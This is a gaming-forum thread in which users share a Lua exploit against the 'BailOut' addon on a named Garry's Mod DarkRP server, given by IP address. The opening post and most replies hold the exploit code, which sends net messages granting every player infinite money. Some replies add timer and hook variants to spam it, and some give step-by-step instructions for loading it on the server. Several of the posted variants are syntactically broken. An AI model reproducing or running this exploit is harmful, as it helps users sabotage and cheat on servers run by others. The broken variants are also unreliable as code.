Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Steam Games Hacks & Cheats › Garry's Mod Hacks & Cheats › Garry's Mod Server Exploits & Help › DarkRP server with money exploit

DarkRP server with money exploit

Posts 1–15 of 19 · Page 1 of 2
TopKekSwag
TopKekSwag
DarkRP server with money exploit
I found an autistic DarkRP server that still has the BailOut addon that you can exploit to give people money.
I got banned on it, so I thought I'd put the IP here so you kids can have some fun with it while it lasts.

IP: 76.164.209.235:27055

To make the admins butthurt real quick:
Code:
for k, v in pairs(player.GetAll()) do
	net.Start("BailOut")
	net.WriteEntity(v)
	net.WriteEntity(v)
	net.WriteFloat(math.huge)
	net.SendToServer()
end
enjoy
#1 · 10y ago
Yimo
Yimo
I am stupid, so what do I do with this? Haha
#2 · 10y ago
Keepo123
Keepo123
Code:
function k()
	for k, v in pairs(player.GetAll()) do
	net.Start("BailOut")
	net.WriteEntity(v)
	net.WriteEntity(v)
	net.WriteFloat(math.huge)
	net.SendToServer()
end
timer.Create("", 0.1, 0, k)
will spam the script
#3 · 10y ago
BU
buckballs
Quote Originally Posted by Yimo View Post
I am stupid, so what do I do with this? Haha
Copy this code and paste it into a text file. Save the file as hack.lua. Copy hack.lua into your garry's mod lua folder. get onto the server and do lua_openscript_cl hack.lua
#4 · 10y ago
YA
yarmis
There is an error
#5 · 10y ago
SU
suchisgood
Quote Originally Posted by Keepo123 View Post
Code:
function k()
	for k, v in pairs(player.GetAll()) do
	net.Start("BailOut")
	net.WriteEntity(v)
	net.WriteEntity(v)
	net.WriteFloat(math.huge)
	net.SendToServer()
end
timer.Create("", 0.1, 0, k)
will spam the script
Code:
function k()
	for k, v in pairs(player.GetAll()) do
	net.Start("BailOut")
	net.WriteEntity(v)
	net.WriteEntity(v)
	net.WriteFloat(math.huge)
	net.SendToServer()
end
timer.Create("", 0.1, 0, function() k() end)
#6 · 10y ago
HU
Hunter
/Moved to the correct section.
#7 · 10y ago
DF
dfsmonkeyspamd
It gave me an error and didn't work, do i need a certain DLL?
#8 · 10y ago
Keepo123
Keepo123
Quote Originally Posted by suchisgood View Post
Code:
function k()
	for k, v in pairs(player.GetAll()) do
	net.Start("BailOut")
	net.WriteEntity(v)
	net.WriteEntity(v)
	net.WriteFloat(math.huge)
	net.SendToServer()
end
timer.Create("", 0.1, 0, function() k() end)
I don't understand?
#9 · 10y ago
SU
suchisgood
Quote Originally Posted by Keepo123 View Post
I don't understand?
It wouldn't work as stated above your post @dfsmonkeyspamd
#10 · 10y ago
Keepo123
Keepo123
Quote Originally Posted by suchisgood View Post
It wouldn't work as stated above your post @dfsmonkeyspamd
Oh, well I most of mistyped something, I've never used "function() k() end)" in a timer and it has worked.
#11 · 10y ago
MR
mr. kifrizzles
Quote Originally Posted by Keepo123 View Post
Code:
function k()
	for k, v in pairs(player.GetAll()) do
	net.Start("BailOut")
	net.WriteEntity(v)
	net.WriteEntity(v)
	net.WriteFloat(math.huge)
	net.SendToServer()
end
timer.Create("", 0.1, 0, k)
will spam the script
Or you can do something with a hook!

hook.Add("CreateMove", "BailSpam", function()for k, v in pairs(player.GetAll()) do
net.Start("BailOut")
net.WriteEntity(v)
net.WriteEntity(v)
net.WriteFloat(math.huge)
net.SendToServer()
end
end);
#12 · 10y ago
Gorzoid
Gorzoid
Quote Originally Posted by mr. kifrizzles View Post
Or you can do something with a hook!

hook.Add("CreateMove", "BailSpam", function()for k, v in pairs(player.GetAll()) do
net.Start("BailOut")
net.WriteEntity(v)
net.WriteEntity(v)
net.WriteFloat(math.huge)
net.SendToServer()
end
end);
ewww, if you are going to use a hook, use think or tick
#13 · 10y ago
Feardex
Feardex
How does this work?

I've been doing anything, its giving me an error

Im getting this error:

[ERROR] lua/ lolz.lua:9: 'end' expected (to close 'function' at line 1) near '<eof>'
1. unknown - lua/ lolz.lua:0
#14 · edited 10y ago · 10y ago
AW
Awesomenoob33
Quote Originally Posted by buckballs View Post
Copy this code and paste it into a text file. Save the file as hack.lua. Copy hack.lua into your garry's mod lua folder. get onto the server and do lua_openscript_cl hack.lua
I did all of that exactly the way the instructions said on the listed server but I just get an error.
Somebody please help me.
#15 · 10y ago
Posts 1–15 of 19 · Page 1 of 2

Post a Reply

Similar Threads

  • Shitty DarkRP server with retarded adminsBy digitaldesiqn in Garry's Mod Discussions & Help
    0Last post 11y ago
  • New DarkRP Money Exploits? (Wire, Money Pot, etc)?By Infectability in Garry's Mod Discussions & Help
    2Last post 12y ago
  • Server with extended ban exploit!By tehhkp in Garry's Mod Hacks & Cheats
    6Last post 11y ago
  • Selling a darkrp money exploit? [Details inside]By spaggy in Garry's Mod Discussions & Help
    26Last post 13y ago
  • Garry's Mod DarkRP server money service.By GeeZeeJay in User Services
    0Last post 11y ago

Tags for this Thread

None